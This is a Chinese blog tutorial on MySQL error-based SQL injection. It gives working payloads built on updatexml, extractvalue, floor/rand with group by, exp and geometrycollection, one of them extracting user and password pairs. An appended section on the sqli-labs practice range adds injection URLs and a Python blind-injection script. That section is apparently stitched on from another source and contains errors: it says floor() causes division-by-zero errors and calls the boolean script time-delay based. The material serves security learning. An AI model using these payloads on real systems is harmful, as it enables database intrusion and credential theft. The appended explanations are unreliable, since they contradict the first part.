sql注入基础-mysql报错注入

原理

当联合注入无法回显时,可以利用报错回显,同时查询指令或者SQL函数会被执行,报错的过程可能会出现在查询或者插入甚至删除的过程中。

条件:

查询语句会被执行
报错信息有回显

常用函数

updatexml()

updatexml(目标xml内容,xml文档路径,更新的内容)

当参数2xml文档路径包含字符~,会判断不合法,输出字符~报错

利用concat函数将子查询语句与字符~拼接

例如:
select * from xxx where id=1 and updatexml(1,concat(0x7e,子查询语句),1)

extractvalue()

原理与updatexml基本一致,extractvalue少了一个new_xml(更新的内容)参数

例如:
select * from xxx where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))

count()、floor、rand()、group by

count()函数用于统计表中记录,返回匹配条件的行数;
floor()函数返回小于等于参数值的最大整数;
rand()函数返回[0,1)之间的随机数;
group by函数将查询结果进行分组。
这四个函数的组合可以构造报错回显。

限制是表中必须至少有3条数据,8.x>mysql>5.0

如下例子1:

select count(*),floor(rand(0)*2) a from passwd group by a

passwd表中有6条数据

①floor(rand(0)*2)
rand()函数产生0到1的随机数
当设置参数为0时,rand(0)产生伪随机数,即数值是固定的
select rand(0) from passwd会产生固定的6条数据值
在这里插入图片描述
通过floor(rand(0)*2)取整,可以巧妙地将这6条数据变为011011的数据序列

②floor(rand(0)2) a
即将查询字段重命名为a
在这里插入图片描述
③select count(
),floor(rand(0)*2) a from passwd group by a
大体意思就是从passwd表中以floor(rand(0)*2)字段值(命名为 a字段)为种类,对出现的种类用count函数进行计数统计。

④很正常的一条统计语句,关键在于group by的处理机制
由于随机函数rand(0)和常规数值不同,group by在处理时会建立虚拟表,类似于缓存,在查询时先执行随机函数再插入到虚拟表中,这就造成写入和插入一条记录时,rand(0)会被各执行一次。

⑤问题出在写入第三条记录时,会造成主键冲突,即③中提到的‘种类’一词,具体过程参考大佬文章
在这里插入图片描述
执行例子1,可以看到报错:group_key字段值‘1’重复写入
在这里插入图片描述
所以报错回显点在**floor(rand(0)*2)**参数处
利用之前提到的concat函数执行子查询,令查询结果和主键冲突报错一起回显
如下例子2:

select count(*),concat(0x3a,(select user()),0x3a,floor(rand(0)*2)) a from passwd group by a

0x3a即用:分隔一下回显结果
在这里插入图片描述
为了保险起见,可以利用information_schema库中的表,避免出现记录少于三条不报错的情况。

不太常用函数

exp

exp(x)返回 e 的 x 次方,当数据过大溢出时报错,即 x > 709
payload:

exp(~(select * from (select (concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from xxx),0x7e))) as a))

geometrycollection

适用mysql5.5
geometrycollection用于构建空间几何对象,通过将参数设为字符串造成报错,类似的还有multipoint
函数参数形式:

geometrycollection(piont(10 10), point(30 30), linestring(15 15, 20 20))
payload:

geometrycollection((select * from(select * from(select version())a)b))
multipoint((select * from(select * from(select version())a)b))

……
还有很多可以构造报错注入的函数,参考大佬文章

### SQLI-LABS 报错注入解决方案教程 #### 背景介绍 SQL 注入是一种常见的安全漏洞,攻击者通过输入恶意的 SQL 查询语来获取敏感信息或破坏数据库。在 `sqli-labs` 靶场中,报错注入是一个重要的学习模块。它利用了某些函数或语法特性,在执行过程中触发错误消息,并从中提取有用的信息。 以下是针对 `sqli-labs` 报错注入的具体方法和技巧: --- #### 使用特定函数触发错误 MySQL 提供了一些内置函数,这些函数可以在查询失败时返回详细的错误信息。常用的有以下几个: - **`extractvalue()`**: 可用于从 XML 数据中提取值。如果指定的节点不存在,则会抛出异常。 - **`updatexml()`**: 类似于 `extractvalue()`,但它主要用于更新 XML 文档中的值。 - **`floor()` 和随机数组合**: 利用浮点运算引发除零错误或其他计算错误。 例如,可以通过以下方式构造查询字符串[^2]: ```sql ?id=1' || extractvalue(1,concat(0x3a,(select database()))) --+ ``` 上述语的作用是从目标数据库中提取当前使用的数据库名称。 --- #### 结合联合查询与条件判断 为了进一步验证是否存在注入点以及如何绕过过滤器,可以尝试使用布尔盲注的方式逐步缩小范围。比如,假设需要猜测第 i 位字符是否为某个具体字母 a-z 或 A-Z,可采用如下形式[^3]: ```sql ?id=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='security'),i,1))>ascii_value -- ``` 这里的关键在于调整变量 `i` 来定位不同的位置,并比较其对应的 ASCII 值大小关系。 --- #### 自动化工具辅助分析 手动测试虽然有助于理解原理,但在实际场景下效率较低。因此推荐借助一些自动化脚本或者开源项目完成批量探测工作。Burp Suite Pro 版本自带 Intruder 功能非常适合此类任务;另外还有专门设计用来处理 Web 应用程序安全性评估工作的 OWASP ZAP 工具可供选择。 对于初学者来说,也可以编写简单的 Python 脚本来实现基本功能。下面给出一段示范代码片段作为参考[^4]: ```python import requests url = "http://localhost/sqli-labs/Less-5/?id=" payload_template = "' OR (SELECT ASCII(SUBSTR(({query}),{pos},1)))={char}-- " characters = range(32, 127) def get_char(pos): for char in characters: payload = url + payload_template.format(query="database()", pos=pos, char=char) response = requests.get(payload).text if "You are in" in response: return chr(char), True return None, False result = "" for position in range(1, 9): # Assuming DB name length is known to be 8 chars. next_character, success = get_char(position) if not success: break result += str(next_character) print(f"The extracted db name is {result}") ``` 此脚本实现了基于时间延迟反馈机制下的单字节恢复过程演示效果。 --- #### 注意事项 尽管以上技术能够有效帮助学员掌握核心概念,但仍需注意合法合规前提下方能实践演练。切勿非法入侵他人系统! ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值